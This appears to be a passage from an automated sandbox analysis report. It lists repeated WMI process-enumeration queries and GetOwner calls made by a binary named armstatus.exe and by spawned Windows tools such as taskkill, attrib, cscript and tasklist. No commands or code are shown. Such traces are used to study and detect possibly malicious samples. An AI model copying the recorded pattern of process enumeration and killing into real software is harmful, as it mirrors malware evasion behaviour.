Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armstatus.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\inst_fold\armstatus.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\inst_fold\armstatus.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\inst_fold\armstatus.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\inst_fold\armstatus.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armstatus.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armstatus.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\inst_fold\armstatus.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\dllhost.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecMethod - \\computer\root\cimv2:Win32_Process.Handle=&quot;4&quot;::GetOwner
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\find.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\timeout.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\taskkill.exeWMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
